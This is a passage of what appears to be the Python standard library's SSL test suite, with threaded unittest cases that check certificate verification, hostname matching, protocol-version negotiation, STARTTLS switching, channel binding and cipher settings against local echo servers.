# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
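# try_protocol_combo() interprets expect_success three ways: True means the
# handshake must succeed, False means it must fail (SSLError or a connection
# reset), and a string such as 'TLSv1' additionally pins the negotiated
# protocol version.  Illustrative call:
#
#     try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1',
#                        certsreqs=ssl.CERT_REQUIRED)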
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
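# The STARTTLS exchange above follows the usual upgrade pattern: talk in the
# clear, send the upgrade token, and only wrap the *same* socket once the
# peer acknowledges it; unwrap() later hands the plain socket back.
# Client-side sketch (illustrative, hedged):
#
#     sock.sendall(b"STARTTLS")
#     if sock.recv(1024).strip().lower().startswith(b"ok"):
#         tls = ssl.wrap_socket(sock)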
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on an SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
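# get_channel_binding('tls-unique') returns bytes derived from the TLS
# Finished message, so both peers observe the same value for a given
# handshake and a fresh handshake yields different data -- which is exactly
# what the two connections above assert.  Illustrative check (hedged):
#
#     cb = conn.get_channel_binding("tls-unique")   # None before handshake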
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
